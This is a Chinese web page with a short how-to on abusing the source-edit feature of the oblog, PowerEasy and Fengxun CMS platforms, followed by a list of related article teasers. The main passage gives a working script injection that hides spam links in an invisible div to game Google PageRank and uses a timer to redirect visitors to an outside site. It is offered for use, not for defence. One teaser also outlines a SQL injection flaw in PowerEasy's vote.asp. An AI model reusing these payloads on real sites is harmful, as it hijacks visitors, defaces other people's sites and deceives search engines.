关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。
具体操作是:
1,进入"源码"编辑
2,输入阶段公分四段:
第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容>
第二段:<script>document.write('<div style="display:none">');</script>
第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会被搜索引擎发现>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location='http://31u.net';}</SCRIPT>
第一段你可以略过,如果你想剧烈的强奸的话。第二段代码是为了隐藏第三段的链接。第四段为定时和跳转。将时间设定超过10秒为好,呵呵有利于搜索引擎收录嘛。
也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。
3,提交。
此方法目前没有解决ubb转换的问题。但是作者目前发现好多的文章系统什么的都没有进行ubb转换,动网论坛目前暂时无法强奸,正在进一步研究中
相关推荐
-
关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
目前的oblog.动易.风讯等一系列著名的系统,都存在源码编辑漏洞. 具体操作是: 1,进入"源码"编辑 2,输入阶段公分四段: 第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容> 第二段:<script>document.write('<div style="display:none">');</script> 第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会
-
2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞
测试系统: 动易(PowerEasy CMS SP6 071030以下版本) 安全综述: 动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品. 漏洞描述: vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入 但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制.但是其过滤的顺序不对.有导致mss
-
asp.net 源码保存 用程序分页
源码: 复制代码 代码如下: namespace Alex { public class PageTools { /// <summary> /// 表名称 /// </summary> private string tableName; public string TableName { get { return tableName; } set { tableName = value; } } /// <summary> /// 返回的列名 /// </sum
-
vue-router源码之history类的浅析
当前版本: 3.0.3 类目录: src/history/base.js 前言: 对于vue-router来说,有三种路由模式history,hash,abstract, abstract是运行在没有window的环境下的,这三种模式都是继承于history类,history实现了一些共用的方法,对于一开始看vue-router源码来说,可以从这里开始看起. 初始属性 router: Router; 表示VueRouter实例.实例化History类时的第一个参数 base: string; 表
-
易语言获取网页源码的方法
信息爆炸的时代,同样引领者软件产业的不断变化.目前,软件的需求已经不是从单一面向复杂,不单单考虑某一方面的需求而是多方面需求的融合.那么,易语言如何读取网页源码呢?下面,就由MovieClip给大家讲解一下吧! 1.首先,运行"易语言"主程序,弹出"新建工程对话框"选择"Windows窗口程序"然后点击"确定"按钮,进入"Windows窗口程序设计界面".如下图: 2.接下来,拖放标签组件一个.编辑框组件两
-
React事件机制源码解析
React v17里事件机制有了比较大的改动,想来和v16差别还是比较大的. 本文浅析的React版本为17.0.1,使用ReactDOM.render创建应用,不含优先级相关. 原理简述 React中事件分为委托事件(DelegatedEvent)和不需要委托事件(NonDelegatedEvent),委托事件在fiberRoot创建的时候,就会在root节点的DOM元素上绑定几乎所有事件的处理函数,而不需要委托事件只会将处理函数绑定在DOM元素本身. 同时,React将事件分为3种类型--d
-
java中break和continue源码解析
在自己学习java语言的过程中,很容易把break和continue的用法混淆.为了便于以后快速查阅及温习,在此特留学习笔记一份. 简述 在任何迭代语句的主体部分,都可以用break和continue控制循环的流程.其中,break用于强行退出循环,不执行循环中剩余的语句.而continue则停止执行当前迭代,然后退回循环起始处,开始下一次迭代. 源码 下面这个程序向大家展示了break和continue在for和while循环中的例子: package com.mufeng.thefourth
-
最新版本的动易+动网+oBlog三站整合方法
我用的是最新版本的动易PE_2006_SP5 +动网dvbbs7.1.0 + oBlog 4.0. 我的测试情况:1.可以同步注册.2.可以同步删除用户ID.3.不像帖子里说的可以同步登陆.(可能是我的COOKIES问题,有在用的测试一下哈)4.可以同步修改密码. 1.准备工作,下载并安装三个系统,并使各自均能独立运行. (1).打开动易压缩包 PowerEasy_CMS2006_SP4_Express.rar或PowerEasy_eShop2006_SP4_Express.rar,运行Pow
-
易语言源码被腾讯TP破坏后修复的代码
DLL命令表 .版本 2 .DLL命令 CopyTo_系统信息段, , , "RtlMoveMemory" .参数 Dest, 系统信息段 .参数 Src, 字节集 .参数 Length .DLL命令 CopyTo_SectionInfo, , , "RtlMoveMemory" .参数 Dest, _SectionInfo .参数 Src, 字节集 .参数 Length .DLL命令 CopyFrom_SectionInfo, , , "RtlMoveM
-
jQuery 1.9.1源码分析系列(十五)动画处理之缓动动画核心Tween
在jQuery内部函数Animation中调用到了createTweens()来创建缓动动画组,创建完成后的结果为: 可以看到上面的缓动动画组有四个原子动画组成.每一个原子动画的信息都包含在里面了. 仔细查看createTweens函数,实际上就是遍历调用了tweeners ["*"]的数组中的函数(实际上就只有一个元素). function createTweens( animation, props ) { jQuery.each( props, function( prop, v
随机推荐
- 详解MySQL数据库的安装与密码配置
- struts1实现简单的登录功能实例(附源码)
- iOS实现富文本编辑器的方法详解
- Oracle 多参数查询语句
- PHP cURL初始化和执行方法入门级代码
- Laravel 中使用 Vue.js 实现基于 Ajax 的表单提交错误验证操作
- redis安装、配置、使用和redis php扩展安装教程
- Ubuntu14.04安装pycharm的步骤
- Python 异常处理实例详解
- C语言进制转换代码分享
- MySQL 与 Elasticsearch 数据不对称问题解决办法
- Javascript 判断Flash是否加载完成的代码
- linux 中的ls命令参数详解及ls命令的使用实例
- VBS中转换二进制数据为字符串常用办法
- 基于JQuery的购物车添加删除以及结算功能示例
- Javascript仿PHP $_GET获取URL中的参数
- Linux管理员手册(2)--目录树概述
- ASP开发网页牢记注意事项
- 教你读懂路由表
- kindeditor 加入七牛云上传的实例讲解